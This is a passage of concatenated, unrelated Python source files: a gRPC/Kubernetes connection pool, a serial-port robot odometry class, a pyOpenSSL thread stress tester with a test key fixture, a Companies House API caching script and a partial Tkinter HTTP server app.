udp_server_thread.join(timeout=5.0)
print("shutdown from main thread")
SERVER.shutdown()
SERVER.server_close()
udp_server.shutdown()
udp_server.server_close()
time.sleep(1)
except Exception as e:
indent = len(program_name) * " "
sys.stderr.write(program_name + ": " + repr(e) + "\n")
sys.stderr.write(indent + " for help use --help\n")
return 2
if __name__ == "__main__":
sys.exit(main())
|
networking.py
|
import ast
import asyncio
import ipaddress
import socket
from abc import abstractmethod
from argparse import Namespace
from threading import Thread
from typing import Optional
import grpc
from jina.logging.logger import JinaLogger
from jina.proto import jina_pb2_grpc
from jina.types.message import Message
from .. import __default_host__, __docker_host__
from ..helper import get_public_ip, get_internal_ip, get_or_reuse_loop
if False:
import kubernetes
class ConnectionList:
"""
    Maintains a list of connections and uses round robin for selecting a connection
:param port: port to use for the connections
"""
def __init__(self, port: int):
self.port = port
self._connections = []
self._address_to_connection_idx = {}
self._rr_counter = 0
def add_connection(self, address: str, connection):
"""
Add connection with ip to the connection list
:param address: Target address of this connection
:param connection: The connection to add
"""
if address not in self._address_to_connection_idx:
self._address_to_connection_idx[address] = len(self._connections)
self._connections.append(connection)
def remove_connection(self, address: str):
"""
Remove connection with ip from the connection list
:param address: Remove connection for this address
:returns: The removed connection or None if there was not any for the given ip
"""
if address in self._address_to_connection_idx:
return self._connections.pop(self._address_to_connection_idx.pop(address))
return None
def get_next_connection(self):
"""
Returns a connection from the list. Strategy is round robin
:returns: A connection from the pool
"""
connection = self._connections[self._rr_counter]
self._rr_counter = (self._rr_counter + 1) % len(self._connections)
return connection
def pop_connection(self):
"""
Removes and returns a connection from the list. Strategy is round robin
:returns: The connection removed from the pool
"""
if self._connections:
connection = self._connections.pop(self._rr_counter)
self._rr_counter = (
(self._rr_counter + 1) % len(self._connections)
if len(self._connections)
else 0
)
return connection
else:
return None
def has_connection(self, address: str) -> bool:
"""
Checks if a connection for ip exists in the list
:param address: The address to check
:returns: True if a connection for the ip exists in the list
"""
return address in self._address_to_connection_idx
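# Illustrative usage sketch (not part of the original module): with two
# connections registered, get_next_connection() alternates between them in
# round-robin order.
def _connection_list_round_robin_example():
    pool = ConnectionList(port=8080)
    pool.add_connection('1.1.1.1:8080', 'conn_a')  # any connection-like object works here
    pool.add_connection('2.2.2.2:8080', 'conn_b')
    assert pool.get_next_connection() == 'conn_a'
    assert pool.get_next_connection() == 'conn_b'
    assert pool.get_next_connection() == 'conn_a'  # wraps around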
class ConnectionPool:
"""
Manages a list of connections.
:param logger: the logger to use
:param on_demand_connection: Flag to indicate if connections should be created on demand
"""
def __init__(self, logger: Optional[JinaLogger] = None, on_demand_connection=True):
self._connections = {}
self._on_demand_connection = on_demand_connection
self._logger = logger or JinaLogger(self.__class__.__name__)
def send_message(self, msg: Message, target_address: str):
"""Send msg to target_address via one of the pooled connections
:param msg: message to send
:param target_address: address to send to, should include the port like 1.1.1.1:53
:return: result of the actual send method
"""
if target_address in self._connections:
pooled_connection = self._connections[target_address].get_next_connection()
return self._send_message(msg, pooled_connection)
elif self._on_demand_connection:
            # If on-demand connections are enabled and an unknown address is requested: create it
connection_pool = self._create_connection_pool(target_address)
return self._send_message(msg, connection_pool.get_next_connection())
else:
raise ValueError(f'Unknown address {target_address}')
def _create_connection_pool(self, target_address):
port = target_address[target_address.rfind(':') + 1 :]
connection_pool = ConnectionList(port=port)
connection_pool.add_connection(
target_address, self._create_connection(target=target_address)
)
self._connections[target_address] = connection_pool
return connection_pool
def start(self):
"""
Starts the connection pool
"""
pass
def close(self):
"""
Closes the connection pool
"""
self._connections.clear()
@abstractmethod
def _send_message(self, msg: Message, connection):
...
@abstractmethod
def _create_connection(self, target):
...
class GrpcConnectionPool(ConnectionPool):
"""
GrpcConnectionPool which uses gRPC as the communication mechanism
"""
def _send_message(self, msg: Message, connection):
# this wraps the awaitable object from grpc as a coroutine so it can be used as a task
# the grpc call function is not a coroutine but some _AioCall
async def task_wrapper(new_message, stub):
await stub.Call(new_message)
return asyncio.create_task(task_wrapper(msg, connection))
def _create_connection(self, target):
self._logger.debug(f'create connection to {target}')
channel = grpc.aio.insecure_channel(
target,
options=[
('grpc.max_send_message_length', -1),
('grpc.max_receive_message_length', -1),
],
)
return jina_pb2_grpc.JinaDataRequestRPCStub(channel)
class K8sGrpcConnectionPool(GrpcConnectionPool):
"""
Manages grpc connections to replicas in a K8s deployment.
:param namespace: K8s namespace to operate in
:param client: K8s client
:param logger: the logger to use
"""
def __init__(
self,
namespace: str,
client: 'kubernetes.client.CoreV1Api',
logger: JinaLogger = None,
):
super().__init__(logger=logger, on_demand_connection=False)
self._namespace = namespace
self._deployment_clusteraddresses = {}
self._k8s_client = client
self._k8s_event_queue = asyncio.Queue()
self.enabled = False
self._fetch_initial_state()
from kubernetes import watch
self._api_watch = watch.Watch()
self.update_thread = Thread(target=self.run, daemon=True)
def _fetch_initial_state(self):
namespaced_pods = self._k8s_client.list_namespaced_pod(self._namespace)
for item in namespaced_pods.items:
self._process_item(item)
def start(self):
"""
Subscribe to the K8s API and watch for changes in Pods
"""
self._loop = get_or_reuse_loop()
self._process_events_task = asyncio.create_task(self._process_events())
self.update_thread.start()
async def _process_events(self):
while self.enabled:
event = await self._k8s_event_queue.get()
self._process_item(event)
def run(self):
"""
        Subscribes to MODIFIED events from the list_namespaced_pod K8s API
"""
self.enabled = True
while self.enabled:
for event in self._api_watch.stream(
self._k8s_client.list_namespaced_pod, self._namespace
):
if event['type'] == 'MODIFIED':
asyncio.run_coroutine_threadsafe(
self._k8s_event_queue.put(event['object']), self._loop
)
if not self.enabled:
break
def close(self):
"""
Closes the connection pool
"""
self.enabled = False
self._process_events_task.cancel()
self._api_watch.stop()
super().close()
def send_message(self, msg: Message, target_address: str):
"""
Send msg to target_address via one of the pooled connections.
:param msg: message to send
:param target_address: address to send to, should include the port like 1.1.1.1:53
:return: result of the actual send method
"""
host, port = target_address.split(':')
# host can be a domain instead of IP Address, resolve it to IP Address
return super().send_message(msg, f'{socket.gethostbyname(host)}:{port}')
@staticmethod
def _pod_is_up(item):
return item.status.pod_ip is not None and item.status.phase == 'Running'
def _process_item(self, item):
deployment_name = item.metadata.labels["app"]
is_deleted = item.metadata.deletion_timestamp is not None
if not is_deleted and self._pod_is_up(item):
if deployment_name in self._deployment_clusteraddresses:
self._add_pod_connection(deployment_name, item)
else:
cluster_ip, port = self._find_cluster_ip(deployment_name)
if cluster_ip:
self._deployment_clusteraddresses[
deployment_name
] = f'{cluster_ip}:{port}'
self._connections[f'{cluster_ip}:{port}'] = ConnectionList(port)
self._add_pod_connection(deployment_name, item)
else:
self._logger.debug(
f'Observed state change in unknown deployment {deployment_name}'
)
elif (
is_deleted
and self._pod_is_up(item)
and deployment_name in self._deployment_clusteraddresses
):
self._remove_pod_connection(deployment_name, item)
def _remove_pod_connection(self, deployment_name, item):
target = item.status.pod_ip
connection_pool = self._connections[
self._deployment_clusteraddresses[deployment_name]
]
if connection_pool.has_connection(f'{target}:{connection_pool.port}'):
self._logger.debug(
f'Removing connection to {target}:{connection_pool.port} for deployment {deployment_name} at {self._deployment_clusteraddresses[deployment_name]}'
)
self._connections[
self._deployment_clusteraddresses[deployment_name]
].remove_connection(f'{target}:{connection_pool.port}')
def _add_pod_connection(self, deployment_name, item):
target = item.status.pod_ip
connection_pool = self._connections[
self._deployment_clusteraddresses[deployment_name]
]
if not connection_pool.has_connection(f'{target}:{connection_pool.port}'):
self._logger.debug(
f'Adding connection to {target}:{connection_pool.port} for deployment {deployment_name} at {self._deployment_clusteraddresses[deployment_name]}'
)
connection_pool.add_connection(
f'{target}:{connection_pool.port}',
self._create_connection(target=f'{target}:{connection_pool.port}'),
)
def _extract_app(self, service_item):
if service_item.metadata.annotations:
return ast.literal_eval(
list(service_item.metadata.annotations.values())[0]
)['spec']['selector']['app']
elif service_item.metadata.labels:
return service_item.metadata.labels['app']
return None
def _find_cluster_ip(self, deployment_name):
service_resp = self._k8s_client.list_namespaced_service(self._namespace)
for s in service_resp.items:
app = self._extract_app(s)
if app and deployment_name == app and s.spec.cluster_ip:
# find the port-in for this deployment
for p in s.spec.ports:
if p.name == 'port-in':
return s.spec.cluster_ip, p.port
return None, None
def is_remote_local_connection(first: str, second: str):
"""
    Decides whether ``first`` is a remote host and ``second`` is localhost
:param first: the ip or host name of the first runtime
:param second: the ip or host name of the second runtime
:return: True, if first is remote and second is local
"""
try:
first_ip = ipaddress.ip_address(first)
first_global = first_ip.is_global
except ValueError:
if first == 'localhost':
first_global = False
else:
first_global = True
try:
second_ip = ipaddress.ip_address(second)
second_local = second_ip.is_private or second_ip.is_loopback
except ValueError:
if second == 'localhost':
second_local = True
else:
second_local = False
return first_global and second_local
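# Illustrative examples (not part of the original module): a public address
# paired with a loopback address counts as remote-to-local.
#   is_remote_local_connection('8.8.8.8', '127.0.0.1')   -> True
#   is_remote_local_connection('localhost', '127.0.0.1') -> False  (first is not remote)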
def get_connect_host(
bind_host: str,
bind_expose_public: bool,
connect_args: Namespace,
) -> str:
"""
Compute the host address for ``connect_args``
:param bind_host: the ip for binding
:param bind_expose_public: True, if bind socket should be exposed publicly
:param connect_args: configuration for the host ip connection
:return: host ip
"""
runs_in_docker = connect_args.runs_in_docker
# by default __default_host__ is 0.0.0.0
# is BIND at local
bind_local = bind_host == __default_host__
# is CONNECT at local
conn_local = connect_args.host == __default_host__
# is CONNECT inside docker?
# check if `uses` has 'docker://' or,
# it is a remote pea managed by jinad. (all remote peas are inside docker)
conn_docker = (
(
getattr(connect_args, 'uses', None) is not None
and (
connect_args.uses.startswith('docker://')
or connect_args.uses.startswith('jinahub+docker://')
)
)
or not conn_local
or runs_in_docker
)
# is BIND & CONNECT all on the same remote?
bind_conn_same_remote = (
not bind_local and not conn_local and (bind_host == connect_args.host)
)
# pod1 in local, pod2 in local (conn_docker if pod2 in docker)
if bind_local and conn_local:
return __docker_host__ if conn_docker else __default_host__
# pod1 and pod2 are remote but they are in the same host (pod2 is local w.r.t pod1)
if bind_conn_same_remote:
return __docker_host__ if conn_docker else __default_host__
if bind_local and not conn_local:
# in this case we are telling CONN (at remote) our local ip address
if connect_args.host.startswith('localhost'):
# this is for the "psuedo" remote tests to pass
return __docker_host__
return get_public_ip() if bind_expose_public else get_internal_ip()
else:
# in this case we (at local) need to know about remote the BIND address
return bind_host
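# Illustrative example (not from the original module): with the default bind
# host and a CONNECT side that runs inside docker, the docker host address is
# returned so the container can reach the locally bound socket.
#   from argparse import Namespace
#   get_connect_host(__default_host__, False,
#                    Namespace(host=__default_host__, runs_in_docker=True, uses=None))
#   # -> __docker_host__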
def create_connection_pool(args: 'Namespace') -> ConnectionPool:
"""
Creates the appropriate connection pool based on args
:param args: Arguments for this pod
:return: A connection pool object
"""
if args.k8s_namespace and args.k8s_connection_pool:
from jina.peapods.pods.k8slib.kubernetes_tools import K8sClients
k8s_clients = K8sClients()
return K8sGrpcConnectionPool(
namespace=args.k8s_namespace,
client=k8s_clients.core_v1,
)
else:
return GrpcConnectionPool()
|
base_use.py
|
import os
import time
from multiprocessing import Process
def me_process(process_name):
time.sleep(3)
print('current process name is : {} **** pid is {}'.format(process_name, os.getpid()))
class MeProcess(Process):
def __init__(self, name, *args, **kwargs):
super().__init__(*args, **kwargs)
self.process_name = name
def run(self):
time.sleep(3)
print('current process name is : {} **** pid is {}'.format(self.process_name, os.getpid()))
if __name__ == '__main__':
# p = Process(target=me_process, args=('me_process',))
# p.start()
# p.join()
mp = MeProcess('fuck process')
mp.start()
mp.join()
    print('Process execution finished')
|
Robot.py
|
__author__ = 'Edward J. C. Ashenbert'
import sys
import threading
import time
import serial
from NavigationSystem.UtilitiesMacroAndConstant import *
import datetime
import numpy as np
import math  # needed by get_dislocation() for the wheel-angle trigonometry
class Robot:
def __init__(self, port, baud_rate):
try:
print("Opening serial port: %s..." % port + ".")
self.robot_serial = serial.Serial(port, baud_rate, timeout=None)
time.sleep(1)
self.robot_serial.reset_input_buffer()
threading.Thread(target=self.flush_data_serial).start()
self.root_node = "Some thing"
self.prev_distance_front_left = 0
self.prev_distance_front_right = 0
self.prev_distance_rear_left = 0
self.prev_distance_rear_right = 0
except serial.serialutil.SerialException:
print("Serial not found at port " + port + ".")
sys.exit(0)
def flush_data_serial(self):
self.robot_serial.read(self.robot_serial.in_waiting)
time.sleep(0.3)
def write_command(self, cmd):
cmd = str(cmd)
print("\t" + str(datetime.datetime.now().time()) + " --- " + "[[ ", cmd, " ]]")
self.robot_serial.write(bytes(cmd, 'utf-8'))
def convert_string_to_int32(self, strData):
return (np.int32(strData[0]) << 24) + (np.int32(strData[1]) << 16) + (np.int32(strData[2]) << 8) + (
np.int32(strData[3]))
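    # Illustrative example (assuming each element is a numeric string as produced
    # by read_command().split()): the four values are combined most significant first,
    #   convert_string_to_int32(["0", "0", "1", "44"]) == (1 << 8) + 44 == 300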
def read_command(self):
'''
request robot current position
'''
self.write_command("5;")
bytesRead = self.robot_serial.inWaiting()
return self.robot_serial.read(bytesRead)
def reset_dislocation_data(self):
'''
        Every time there's a spin behaviour we need to reset the encoder baselines.
:return:
'''
raw_data = str(self.read_command(), 'utf-8').split()
# self.write_command("5;")
# Check length of receive buffer with start and end frame
if (len(raw_data) == LENGTH_OF_DATA_RECEIVE and raw_data[0] == START_FRAME and raw_data[-1] == END_FRAME):
receive_data = raw_data[1:-1]
else:
return [0,0,0,0]
self.prev_distance_front_left = self.convert_string_to_int32(receive_data[1:5])
self.prev_distance_front_right = self.convert_string_to_int32(receive_data[6:10])
self.prev_distance_rear_left = self.convert_string_to_int32(receive_data[11:15])
self.prev_distance_rear_right = self.convert_string_to_int32(receive_data[16:])
self.prev_distance_front_left = 0
self.prev_distance_front_right = 0
self.prev_distance_rear_left = 0
self.prev_distance_rear_right = 0
def get_dislocation_data(self):
'''
        Get the dislocation of the 4 wheels.
:return: [distance_front_left, distance_front_right, distance_rear_left, distance_rear_right]
'''
raw_data = str(self.read_command(), 'utf-8').split()
# self.write_command("5;")
# Check length of receive buffer with start and end frame
if (len(raw_data) == LENGTH_OF_DATA_RECEIVE and raw_data[0] == START_FRAME and raw_data[-1] == END_FRAME):
receive_data = raw_data[1:-1]
else:
return [0,0,0,0]
distance_front_left = self.convert_string_to_int32(receive_data[1:5])
distance_front_right = self.convert_string_to_int32(receive_data[6:10])
distance_rear_left = self.convert_string_to_int32(receive_data[11:15])
distance_rear_right = self.convert_string_to_int32(receive_data[16:])
# Mapping reverse pulse
distance_front_right = abs(distance_front_right)
distance_front_left = abs(distance_front_left)
distance_rear_left = abs(distance_rear_left)
distance_rear_right = abs(distance_rear_right)
if NAV_DEBUG:
print(self.root_node, "Pulse_receive_from_wheels", distance_front_left, distance_front_right,
distance_rear_left, distance_rear_right)
# Threshold the distance pulse return from wheels
if abs(distance_front_left - self.prev_distance_front_left) > DISTANCE_THRESH:
distance_front_left = self.prev_distance_front_left
if abs(distance_front_right - self.prev_distance_front_right) > DISTANCE_THRESH:
distance_front_right = self.prev_distance_front_right
if abs(distance_rear_left - self.prev_distance_rear_left) > DISTANCE_THRESH:
distance_rear_left = self.prev_distance_rear_left
if abs(distance_rear_right - self.prev_distance_rear_right) > DISTANCE_THRESH:
distance_rear_right = self.prev_distance_rear_right
dislocation_front_left = distance_front_left - self.prev_distance_front_left
dislocation_front_right = distance_front_right - self.prev_distance_front_right
dislocation_rear_left = distance_rear_left - self.prev_distance_rear_left
dislocation_rear_right = distance_rear_right - self.prev_distance_rear_right
self.prev_distance_front_left = distance_front_left
self.prev_distance_front_right = distance_front_right
self.prev_distance_rear_left = distance_rear_left
self.prev_distance_rear_right = distance_rear_right
if NAV_DEBUG:
print(self.root_node, "Dislocation_pulse", dislocation_front_left, dislocation_front_right, dislocation_rear_left, dislocation_rear_right)
return dislocation_front_left, dislocation_front_right, dislocation_rear_left, dislocation_rear_right
def get_dislocation(self):
'''
Get dislocation from robot center
:return: [center_x, center_y]
'''
result = self.get_dislocation_data()
mr_center_x = 0.0
mr_center_y = 0.0
if result:
dislocation_front_left = result[0]
dislocation_front_right = result[1]
dislocation_rear_left = result[2]
dislocation_rear_right = result[3]
            # NOTE: self.vehicle is expected to be assigned externally; it is not set in __init__.
            front_left_angle, front_right_angle, rear_left_angle, rear_right_angle = self.vehicle.get_next_angle(False)
dislocation_front_left_x = dislocation_front_left * math.cos(front_left_angle)
dislocation_front_left_y = dislocation_front_left * math.sin(front_left_angle)
dislocation_front_right_x = dislocation_front_right * math.cos(front_right_angle)
dislocation_front_right_y = dislocation_front_right * math.sin(front_right_angle)
dislocation_rear_left_x = dislocation_rear_left * math.cos(rear_left_angle)
dislocation_rear_left_y = dislocation_rear_left * math.sin(rear_left_angle)
dislocation_rear_right_x = dislocation_rear_right * math.cos(rear_right_angle)
dislocation_rear_right_y = dislocation_rear_right * math.sin(rear_right_angle)
mr_center_x = (dislocation_front_left_x + dislocation_front_right_x + dislocation_rear_left_x + dislocation_rear_right_x) / 4 / ENCODER_TO_METER
mr_center_y = (dislocation_front_left_y + dislocation_front_right_y + dislocation_rear_left_y + dislocation_rear_right_y) / 4 / ENCODER_TO_METER
return mr_center_x, mr_center_y
DELIMITER = ','
ANGLE_COMMAND = 'q'
SPEED_COMMAND = 'n'
EOF = ';'
if __name__ == "__main__":
robot = Robot("COM1", 115200)
front_left_angle = 0
front_right_angle = 0
rear_left_angle = 0
rear_right_angle = 0
front_left_speed = 0
front_right_speed = 0
rear_left_speed = 0
rear_right_speed = 0
robot.write_command(
ANGLE_COMMAND + DELIMITER + str(front_left_angle) + DELIMITER + str(front_right_angle) + DELIMITER + str(
rear_left_angle) + DELIMITER + str(rear_right_angle) + EOF)
robot.write_command(
SPEED_COMMAND + DELIMITER + str(front_left_speed) + DELIMITER + str(front_right_speed) + DELIMITER + str(
rear_left_speed) + DELIMITER + str(rear_right_speed) + EOF)
print(robot.get_dislocation())
|
context-info-callback.py
|
# Copyright (C) Jean-Paul Calderone
# See LICENSE for details.
#
# Stress tester for thread-related bugs in global_info_callback in
# src/ssl/context.c. In 0.7 and earlier, this will somewhat reliably
# segfault or abort after a few dozen to a few thousand iterations on an SMP
# machine (generally not on a UP machine) due to uses of Python/C API
# without holding the GIL.
from itertools import count
from threading import Thread
from socket import socket
from OpenSSL.SSL import Context, TLSv1_METHOD, Connection, WantReadError
from OpenSSL.crypto import FILETYPE_PEM, load_certificate, load_privatekey
cleartextPrivateKeyPEM = (
"-----BEGIN RSA PRIVATE KEY-----\n"
"MIICXAIBAAKBgQDaemNe1syksAbFFpF3aoOrZ18vB/IQNZrAjFqXPv9iieJm7+Tc\n"
"g+lA/v0qmoEKrpT2xfwxXmvZwBNM4ZhyRC3DPIFEyJV7/3IA1p5iuMY/GJI1VIgn\n"
"aikQCnrsyxtaRpsMBeZRniaVzcUJ+XnEdFGEjlo+k0xlwfVclDEMwgpXAQIDAQAB\n"
"AoGBALi0a7pMQqqgnriVAdpBVJveQtxSDVWi2/gZMKVZfzNheuSnv4amhtaKPKJ+\n"
"CMZtHkcazsE2IFvxRN/kgato9H3gJqq8nq2CkdpdLNVKBoxiCtkLfutdY4SQLtoY\n"
"USN7exk131pchsAJXYlR6mCW+ZP+E523cNwpPgsyKxVbmXSBAkEA9470fy2W0jFM\n"
"taZFslpntKSzbvn6JmdtjtvWrM1bBaeeqFiGBuQFYg46VaCUaeRWYw02jmYAsDYh\n"
"ZQavmXThaQJBAOHtlAQ0IJJEiMZr6vtVPH32fmbthSv1AUSYPzKqdlQrUnOXPQXu\n"
"z70cFoLG1TvPF5rBxbOkbQ/s8/ka5ZjPfdkCQCeC7YsO36+UpsWnUCBzRXITh4AC\n"
"7eYLQ/U1KUJTVF/GrQ/5cQrQgftwgecAxi9Qfmk4xqhbp2h4e0QAmS5I9WECQH02\n"
"0QwrX8nxFeTytr8pFGezj4a4KVCdb2B3CL+p3f70K7RIo9d/7b6frJI6ZL/LHQf2\n"
"UP4pKRDkgKsVDx7MELECQGm072/Z7vmb03h/uE95IYJOgY4nfmYs0QKA9Is18wUz\n"
"DpjfE33p0Ha6GO1VZRIQoqE24F8o5oimy3BEjryFuw4=\n"
"-----END RSA PRIVATE KEY-----\n"
)
cleartextCertificatePEM = (
"-----BEGIN CERTIFICATE-----\n"
"MIICfTCCAeYCAQEwDQYJKoZIhvcNAQEEBQAwgYYxCzAJBgNVBAYTAlVTMRkwFwYD\n"
"VQQDExBweW9wZW5zc2wuc2YubmV0MREwDwYDVQQHEwhOZXcgWW9yazESMBAGA1UE\n"
"ChMJUHlPcGVuU1NMMREwDwYDVQQIEwhOZXcgWW9yazEQMA4GCSqGSIb3DQEJARYB\n"
"IDEQMA4GA1UECxMHVGVzdGluZzAeFw0wODAzMjUxOTA0MTNaFw0wOTAzMjUxOTA0\n"
"MTNaMIGGMQswCQYDVQQGEwJVUzEZMBcGA1UEAxMQcHlvcGVuc3NsLnNmLm5ldDER\n"
"MA8GA1UEBxMITmV3IFlvcmsxEjAQBgNVBAoTCVB5T3BlblNTTDERMA8GA1UECBMI\n"
"TmV3IFlvcmsxEDAOBgkqhkiG9w0BCQEWASAxEDAOBgNVBAsTB1Rlc3RpbmcwgZ8w\n"
"DQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBANp6Y17WzKSwBsUWkXdqg6tnXy8H8hA1\n"
"msCMWpc+/2KJ4mbv5NyD6UD+/SqagQqulPbF/DFea9nAE0zhmHJELcM8gUTIlXv/\n"
"cgDWnmK4xj8YkjVUiCdqKRAKeuzLG1pGmwwF5lGeJpXNxQn5ecR0UYSOWj6TTGXB\n"
"9VyUMQzCClcBAgMBAAEwDQYJKoZIhvcNAQEEBQADgYEAmm0Vzvv1O91WLl2LnF2P\n"
"q55LJdOnJbCCXIgxLdoVmvYAz1ZJq1eGKgKWI5QLgxiSzJLEU7KK//aVfiZzoCd5\n"
"RipBiEEMEV4eAY317bHPwPP+4Bj9t0l8AsDLseC5vLRHgxrLEu3bn08DYx6imB5Q\n"
"UBj849/xpszEM7BhwKE0GiQ=\n"
"-----END CERTIFICATE-----\n"
)
count = count()
def go():
port = socket()
port.bind(("", 0))
port.listen(1)
called = []
def info(conn, where, ret):
        print(next(count))
called.append(None)
context = Context(TLSv1_METHOD)
context.set_info_callback(info)
context.use_certificate(
load_certificate(FILETYPE_PEM, cleartextCertificatePEM)
)
context.use_privatekey(
load_privatekey(FILETYPE_PEM, cleartextPrivateKeyPEM)
)
while 1:
client = socket()
client.setblocking(False)
client.connect_ex(port.getsockname())
clientSSL = Connection(Context(TLSv1_METHOD), client)
clientSSL.set_connect_state()
server, ignored = port.accept()
server.setblocking(False)
serverSSL = Connection(context, server)
serverSSL.set_accept_state()
del called[:]
while not called:
for ssl in clientSSL, serverSSL:
try:
ssl.do_handshake()
except WantReadError:
pass
threads = [Thread(target=go, args=()) for i in range(2)]
for th in threads:
th.start()
for th in threads:
th.join()
|
index.py
|
#!/usr/bin/pypy3
#!/usr/bin/python3
from http.client import HTTPSConnection
from base64 import b64encode
import json
import mysql.connector
from datetime import datetime, timedelta
from threading import Thread
import cgi
class ukcompanieshouse:
URL = 'api.companieshouse.gov.uk'
KEY = ''
def __init__(self):
basic_auth = b64encode((self.KEY+':').encode(encoding='ascii', errors='ignore')).decode("ascii")
self.headers = {'Authorization' : 'Basic {}'.format(basic_auth)}
def api(self, req):
c = HTTPSConnection(self.URL)
c.request('GET', req, headers=self.headers)
return c.getresponse().read().decode('utf-8', errors='ignore')
def search(self, keyword):
res = self.api('/search/companies?q={}&items_per_page=10'.format(keyword.replace(' ', '%20')))
results = [[company['title'],company['company_number']] for company in json.loads(res)['items']]
return results
def filing_history(self, company_number):
res = self.api('/company/{}/filing-history'.format(company_number))
results = json.loads(res)
if 'items' in results:
return results['items']
else:
return {}
def officers(self, company_number):
res = self.api('/company/{}/officers'.format(company_number))
results = json.loads(res)
if 'items' in results:
return results['items']
else:
return {}
def persons_with_significant_control(self, company_number):
res = self.api('/company/{}/persons-with-significant-control'.format(company_number))
results = json.loads(res)
if 'items' in results:
return results['items']
else:
return {}
def exemptions(self, company_number):
res = self.api('/company/{}/exemptions'.format(company_number))
results = json.loads(res)
if 'exemptions' in results:
return results['exemptions']
else:
return {}
def registers(self, company_number):
res = self.api('/company/{}/registers'.format(company_number))
results = json.loads(res)
if 'error' in results:
return {}
else:
return results
def company_profile(self, company_number, recursive=True):
res = self.api('/company/{}'.format(company_number))
results = json.loads(res)
for r in results:
if results[r] == False:
results[r] = 'No'
elif results[r] == True:
results[r] = 'Yes'
if recursive:
results['links']['filing_history'] = self.filing_history(company_number)
results['links']['officers'] = self.officers(company_number)
results['links']['persons_with_significant_control'] = self.persons_with_significant_control(company_number)
results['links']['exemptions'] = self.exemptions(company_number)
results['links']['registers'] = self.registers(company_number)
results['date_retrieved'] = str(datetime.now().date())
results['url'] = 'https://beta.companieshouse.gov.uk'+results['links']['self']
return {'results': results}
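# Illustrative usage sketch (assumes a valid API key has been set on
# ukcompanieshouse.KEY; not part of the original CGI flow below):
#   ch = ukcompanieshouse()
#   matches = ch.search('example ltd')           # [[title, company_number], ...]
#   profile = ch.company_profile(matches[0][1])  # {'results': {...}}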
def commit(company_number, results, cursor, cnx):
sql1 = "DELETE FROM ukcompanieshouse WHERE company_number=%s;"
sql2 = "INSERT INTO ukcompanieshouse VALUES(%s, %s, %s);"
val = (
company_number,
results,
str(datetime.now()))
cursor.execute(sql1, (company_number,))
cnx.commit()
cursor.execute(sql2, val)
cnx.commit()
cursor.close()
cnx.close()
def expected(dump):
return True
def main():
form = cgi.FieldStorage()
company_number = str(form['company_number'].value)
cnx = mysql.connector.connect(user='api', database='projectapi')
cursor = cnx.cursor(buffered=True)
sql = "SELECT * FROM ukcompanieshouse WHERE company_number=%s;"
cursor.execute(sql, (company_number,))
cache_results = ''
cache_expired = False
fetch_results = ''
results = ''
try:
data = list(cursor.fetchall()[0])
if (datetime.now()-timedelta(days=30)) > data[2]:
raise IndexError('item in database expired')
cache_results = data[1]
cursor.close()
cnx.close()
except:
cache_expired = True
company = ukcompanieshouse()
fetch_results = json.dumps(company.company_profile(company_number))
finally:
if not cache_expired:
results = cache_results
elif expected(fetch_results):
t1 = Thread(target=commit, args=(company_number, fetch_results, cursor, cnx,))
t1.start()
results = fetch_results
elif cache_expired:
results = cache_results
else:
results = json.dumps({'error':'api access problem'})
return results
if __name__ == '__main__':
print('Content-type:application/json', end='\r\n\r\n')
print(main().encode(encoding='UTF-8',errors='ignore').decode(), end='')
|
app.py
|
"""
import tkinter as tk
from tkinter.ttk import *
import tkinter.font as font
import tkinter.scrolledtext as tkst
"""
import subprocess
from http.server import HTTPServer, BaseHTTPRequestHandler
import socketserver
import socket
from io import BytesIO
import threading
import requests
import os
import signal
import codecs
import time  # used by the main loop at the bottom of this file to avoid busy-waiting
import json
import urllib.parse
from urllib.parse import parse_qsl, parse_qs
from datetime import datetime
# run command:
# python -m app.py --cgi 8001
"""
class Application(tk.Frame):
logcat = "Logcat test"
def __init__(self, master=None):
super().__init__(master)
self.master = master
self.pack(fill="both", expand=1)
self.start = tk.Button(self)
self.stop = tk.Button(self)
self.updateBtn = tk.Button(self)
self.logInput = tk.Entry(self)
self.logSend = tk.Button(self)
self.logCanvas = tk.Canvas(self)
self.logCanvas = tk.Canvas(self)
self.create_widgets()
def create_widgets(self):
self.start["text"] = "Server Start"
self.start["fg"] = "green"
self.start["command"] = self.startServer
self.start["width"] = 20
self.start["height"] = 2
self.start["font"] = font.Font(size=10)
self.start.place(x=2, y=4)
self.stop["text"] = "Server Stop"
self.stop['fg'] = "red"
self.stop['command'] = self.stopServer
self.stop["width"] = 20
self.stop["height"] = 2
self.stop["font"] = font.Font(size=10)
self.stop.place(x=2, y=50)
self.updateBtn["text"] = "Server Update"
self.updateBtn['fg'] = "black"
self.updateBtn['command'] = self.updateServer
self.updateBtn["width"] = 20
self.updateBtn["height"] = 2
self.updateBtn["font"] = font.Font(size=10)
self.updateBtn.place(x=2, y=95)
self.logInput["width"] = 45
self.logInput.place(x=175, y=420)
self.logSend["text"] = "Send"
self.logSend["command"] = self.sendLog
self.logSend["width"] = 5
self.logSend["font"] = font.Font(size=7)
self.logSend.place(x=450, y=420)
self.frame1 = tk.Frame(
master=self,
bg='black',
width=0,
height=0
)
self.frame1.place(x=175, y=5)
self.editArea = tkst.ScrolledText(
master=self.frame1,
wrap=tk.WORD,
bg='black',
fg='white',
width=37,
height=25
)
self.editArea.pack(fill=tk.BOTH, expand=True)
self.editArea.insert(tk.INSERT, "Programm Start.")
# Adding some text, to see if scroll is working as we expect it
self.quit = tk.Button(self, text="QUIT", fg="red", width=20, height=2,
command=self.master.destroy)
self.quit.pack(side="bottom", pady=10)
# button clicks
def say_hi(self):
print("hi there, everyone!")
def startServer(self):
self.editArea.insert(
tk.INSERT, "\nStarting HTTP server: localhost:8000")
print("Starting HTTP server: localhost:8000")
jsonFile = open("thingsaves.json", "r")
req = requests.post(
"http://iotdev.htlwy.ac.at/thing/iotusecases2020/setCloudscript", data=jsonFile.read())
self.httpd = socketserver.TCPServer(
("10.202.240.252", 8000), SimpleHTTPRequestHandler)
self.serverThread = threading.Thread(target=self.serveInThread)
self.serverThread.daemon = True
self.serverThread.start()
pr = Process()
pr.startAllProcesses()
def stopServer(self):
self.editArea.insert(tk.INSERT, "\nStoping Server...")
# self.editArea.insert(tk.INSERT, "\nStoping Server.")
print("Stopping server")
self.serverThread = None
def updateServer(self):
jsonFile = open("thingsaves.json", "r")
req = requests.post(
"http://iotdev.htlwy.ac.at/thing/iotusecases2020/setCloudscript", data=jsonFile.read())
def printCon(self, data):
self.editArea.insert(tk.INSERT, str(data))
print(str(data))
def serveInThread(self):
while True:
self.httpd.handle_request()
def sendLog(self):
# print("Sending Command: " + str(self.logInput.get()))
